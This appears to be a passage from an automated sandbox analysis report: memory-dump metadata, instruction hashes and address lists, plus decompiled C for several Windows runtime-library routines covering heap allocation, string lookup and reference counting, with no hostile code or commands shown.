0x049479d6
0x049479d9
0x049479dc
0x04947a91
0x04947a94
0x00000000
0x04947a94
0x049479e2
0x00000000
0x049479e2
0x04947a74
0x04947a7a
0x00000000
0x00000000
0x04947a8a
0x04947a21
0x04947a21
0x00000000
0x04947a21
0x048dc650
0x048dc651
0x048dc656
0x048dc65c
0x048dc65d
0x048dc663
0x048dc664
0x048dc66a
0x048dc66e
0x049479c5
0x049479c7
0x00000000
0x049479c7
0x048dc67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5787b0574b7be41eb622d946d62f3b2854587cffff24a7974c2963261b8d930e
Instruction ID: 5623b6631c08f1911a0089d1dc936df510e891cc18f8c52ea58d3f1e3682b090
Opcode Fuzzy Hash: 5787b0574b7be41eb622d946d62f3b2854587cffff24a7974c2963261b8d930e
Instruction Fuzzy Hash: 2A818C756446499FDB25CE94C880E7AB3A9EFC4354F2449BAED459B280E330FD41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04956DC9, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E04956DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L048F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E04956B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E048F7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E04919AE0();
					_t87 = L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0495795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0495795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0495795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0495795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L048F4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E04956B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E04956B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E04956B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E04956B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E048F7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E04919AE0();
								L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L048F2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L048F2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L048F2400( &_v52);
							}
							if(_v28 >= 0) {
								return L048F2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x04956dd4
0x04956dde
0x04956de1
0x04956de3
0x04956de6
0x04956de9
0x04956dec
0x04956def
0x04956df2
0x04956df5
0x04956dfe
0x04956e04
0x04956e09
0x04956e0d
0x04956e18
0x04956e1b
0x04956e22
0x04956e2d
0x04956e30
0x04956e36
0x04956e42
0x04956e4d
0x04956e50
0x04956e55
0x04956e5c
0x04956e6e
0x04956e5e
0x04956e67
0x04956e67
0x04956e73
0x04956e74
0x04956e77
0x04956e7c
0x04956e7d
0x04956e8e
0x04956e93
0x04956e9c
0x04956ea8
0x04956eab
0x04956eac
0x04956eb3
0x04956ecd
0x04956edc
0x04956ee2
0x04956ee5
0x04956ef2
0x04956efb
0x04956f01
0x04956f06
0x04956f0b
0x04956f11
0x04956f1a
0x04956f22
0x04956f26
0x04956f26
0x04956f33
0x04956f41
0x04956f44
0x04956f47
0x04956f54
0x04956f65
0x04956f77
0x04956f7c
0x04956f82
0x04956f91
0x04956f99
0x04956fa3
0x04956fae
0x04956fae
0x04956fba
0x04956fbb
0x04956fbc
0x04956fc1
0x04956fc2
0x04956fd3
0x04956fd8
0x04956fd8
0x04956fdf
0x04956fe8
0x04956fee
0x04956fee
0x04956ff5
0x04956ffb
0x04956ffb
0x04957004
0x00000000
0x0495700a
0x04957004
0x04956eb3
0x04956e9c
0x04957015

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 29f44ef61730be8175425ca757d7e96a56ff16c80f26b3a2488cff3bf5bc655c
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: F0716F71E00619AFDB10DFA8C944AEEBBB9FF88714F104569E905E7250D734BE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0496B8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0496B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x49c7b9c; // 0x0
				_t124 = L048F4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E04919800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E049195B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E049195D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L048F77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E04919910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E049195D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x49c7b9c; // 0x0
									_t92 = L048F4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E04919910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E048DA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0496E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0496E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E049195B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x0496b8d9
0x0496b8e4
0x00000000
0x0496b8e6
0x0496b8f3
0x0496b8f5
0x0496b8f5
0x0496b8f8
0x0496b920
0x0496b924
0x0496b936
0x0496b939
0x0496b93d
0x0496b948
0x0496b9a0
0x0496b9a0
0x0496b9a4
0x0496b9bf
0x0496b9c4
0x0496b9c6
0x0496b9cd
0x0496b9d1
0x0496bad4
0x0496bad8
0x0496bada
0x0496badc
0x0496badc
0x0496badf
0x0496bae0
0x0496bae2
0x0496bae4
0x0496baec
0x0496baee
0x0496baf0
0x0496baf0
0x0496baec
0x0496bafb
0x0496bafc
0x0496bafe
0x0496bb01
0x0496bb01
0x00000000
0x0496bb06
0x0496b9d7
0x0496b9db
0x0496b9db
0x0496b9de
0x0496b9de
0x0496b9e4
0x0496b9e7
0x0496b9ea
0x0496b9ec
0x0496b9ef
0x0496b9f3
0x0496ba1b
0x0496ba1b
0x0496ba23
0x0496ba24
0x0496ba27
0x0496ba2a
0x0496ba2b
0x0496ba2e
0x0496ba30
0x0496ba37
0x0496ba3f
0x0496ba9c
0x0496baa2
0x0496bb13
0x0496bb15
0x0496baae
0x0496baae
0x0496bab3
0x0496bab5
0x0496baba
0x0496bac8
0x0496bac8
0x0496baba
0x0496bacd
0x0496bacf
0x00000000
0x0496bacf
0x0496bb1a
0x00000000
0x0496bb1c
0x0496baa7
0x0496bb11
0x00000000
0x0496bb11
0x0496baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x0496ba41
0x0496ba41
0x0496ba41
0x0496ba58
0x0496ba5d
0x0496ba62
0x00000000
0x00000000
0x0496ba64
0x0496ba67
0x0496ba68
0x0496ba69
0x0496ba6c
0x0496ba6f
0x0496ba71
0x0496ba78
0x0496ba80
0x00000000
0x00000000
0x0496ba90
0x0496ba90
0x0496ba97
0x00000000
0x0496ba97
0x0496b9f5
0x0496b9f7
0x0496b9f7
0x0496b9fa
0x0496ba03
0x0496ba07
0x0496ba0c
0x0496ba10
0x0496ba17
0x00000000
0x0496b9f7
0x0496b9a6
0x0496b9a8
0x0496b9af
0x0496b9b3
0x00000000
0x00000000
0x0496b9b9
0x00000000
0x0496b9b9
0x0496b94d
0x0496b98f
0x0496b995
0x0496b999
0x0496b960
0x0496b967
0x0496b968
0x0496b96a
0x00000000
0x0496b96a
0x0496b99b
0x0496b99e
0x00000000
0x00000000
0x00000000
0x0496b99e
0x0496b951
0x0496b954
0x0496b95a
0x0496b95e
0x0496b972
0x0496b979
0x0496b97d
0x0496b97f
0x0496b980
0x0496b982
0x0496b984
0x00000000
0x0496b984
0x00000000
0x0496b926
0x00000000
0x0496b926

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64844101de752681813d67fab5321debf5350348ac2bc79a78911d5d0d5f8b40
Instruction ID: cba84d2b3e38251f076b42ff69f291813a160195ef57de950d657bc6fe13e222
Opcode Fuzzy Hash: 64844101de752681813d67fab5321debf5350348ac2bc79a78911d5d0d5f8b40
Instruction Fuzzy Hash: EB71F132240B15AFEB319F25C844F66B7FAEB40728F144938E656D76A0EB75F940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 048D52A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E048D52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E048EEEF0(0x49c79a0);
					_t104 =  *0x49c8210; // 0x511cb0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E048EEB70(_t93, 0x49c79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E04919890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E048EEEF0(0x49c79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E048EEB70(0, 0x49c79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0x511cc802
								_t13 = _t104 + 0xc; // 0x511cbd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0490F0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E048EEEF0(0x49c79a0);
									__eflags =  *0x49c8210 - _t104; // 0x511cb0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x49c8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2000511c
											_t95 =  *((intOrPtr*)( *_t37));
											E04954888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E048EEB70(_t95, 0x49c79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E049195D0();
											L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E049195D0();
											L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E048EEB70(_t93, 0x49c79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E049195D0();
										L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E049195D0();
										L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2000511c
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0x511cc802
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0490F0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x048d52a5
0x048d52ad
0x048d52b0
0x048d52b3
0x048d52b7
0x048d52ba
0x048d52bf
0x048d52c4
0x048d52cc
0x00000000
0x00000000
0x048d52ce
0x048d52d1
0x048d52d9
0x048d52dd
0x048d52e7
0x048d52f7
0x048d52f9
0x048d52fd
0x04930dcf
0x04930dd5
0x04930dd6
0x04930dd7
0x04930dd8
0x04930dd9
0x04930dde
0x04930ddf
0x04930de0
0x04930de1
0x04930de2
0x04930de2
0x04930de5
0x04930dea
0x04930dec
0x04930f60
0x04930f64
0x04930f70
0x04930f76
0x04930f79
0x04930f79
0x00000000
0x04930f64
0x04930df2
0x04930df7
0x04930e04
0x04930e04
0x04930e0d
0x04930e0d
0x04930e10
0x04930e1a
0x04930e1c
0x04930e4c
0x04930e52
0x04930e61
0x04930e67
0x04930e6b
0x04930e70
0x04930e76
0x04930ed7
0x04930edc
0x04930ee0
0x04930ee6
0x04930eea
0x04930eed
0x04930ef0
0x04930ef3
0x04930ef6
0x04930ef9
0x04930efb
0x04930efe
0x04930f01
0x04930f01
0x04930f0b
0x04930f12
0x04930f16
0x04930f18
0x04930f18
0x04930f1b
0x04930f2c
0x04930f31
0x04930f31
0x04930f35
0x04930f39
0x04930f3a
0x04930f3c
0x04930f3c
0x04930f3f
0x04930f50
0x04930f55
0x04930f55
0x04930f59
0x048d52eb
0x048d52f1
0x048d52f1
0x04930e7d
0x04930e84
0x04930e88
0x04930e8a
0x04930e8a
0x04930e8d
0x04930e9e
0x04930ea3
0x04930ea3
0x04930ea7
0x04930eaf
0x04930eb3
0x04930eb9
0x04930eb9
0x04930ebc
0x04930ecd
0x04930ecd
0x00000000
0x04930eb3
0x04930e1e
0x04930e21
0x04930e25
0x04930e2b
0x04930e2f
0x04930e30
0x04930e3a
0x04930e3f
0x04930e41
0x00000000
0x00000000
0x04930e47
0x00000000
0x04930e47
0x04930df9
0x04930dfe
0x00000000
0x00000000
0x00000000
0x04930dfe
0x048d5303
0x048d5307
0x00000000
0x048d5309
0x00000000
0x048d5309
0x048d5307
0x048d52e9
0x048d52e9
0x00000000
0x048d52e9
0x048d530e
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 128db3cfacbab0b940731d161dbf9f8e67588f8cafccb90e11fda9c0768b3c31
Instruction ID: 1568b0e1b98f2862926ad18d5db78a344fe6dea7a0e114779498de17998815a7
Opcode Fuzzy Hash: 128db3cfacbab0b940731d161dbf9f8e67588f8cafccb90e11fda9c0768b3c31
Instruction Fuzzy Hash: 6B51BB71205746AFE721DF68C840B27BBE4FF81718F104E2AE49997650E7B0F904CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04902AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04902AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x49c8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x49c8208; // 0x49c8207
				_t8 = _t57 + 0x49c8208; // 0x49c8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x49c8450; // 0x513c80
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x49c821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x49c6d5c; // 0x7fe50654
							_t72 =  *0x49c6d5c; // 0x7fe50654
							_t75 =  *0x49c6d5c; // 0x7fe50654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x49c6d5c; // 0x7fe50654
							_t84 =  *0x49c6d5c; // 0x7fe50654
							_t87 =  *0x49c6d5c; // 0x7fe50654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0491F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x04902ae4
0x04902aec
0x04902aef
0x04902af4
0x04902af7
0x04902afd
0x04902b92
0x04902b92
0x04902b97
0x04902b9c
0x04902b9c
0x04902b03
0x04902b06
0x04902b09
0x04902b09
0x04902b0f
0x04902b15
0x04902b15
0x04902b1b
0x04902b1e
0x04902b21
0x04902b26
0x04902b29
0x04902b81
0x04902b84
0x04902c0e
0x04902c15
0x04902c24
0x04902c24
0x04902b8a
0x04902b8a
0x04902b8a
0x04902b8a
0x04902b90
0x00000000
0x00000000
0x00000000
0x00000000
0x04902b4a
0x04902b4a
0x04902b4d
0x04902b53
0x00000000
0x00000000
0x04902b55
0x04902b58
0x04902bb7
0x04945d1b
0x04945d37
0x04945d47
0x04945d53
0x04902bbd
0x04902bbd
0x04902bbd
0x04902bb7
0x04902b5d
0x04902c2f
0x04945d5b
0x04945d77
0x04945d87
0x04945d93
0x04902c35
0x04902c35
0x04902c35
0x04902c2f
0x04902b65
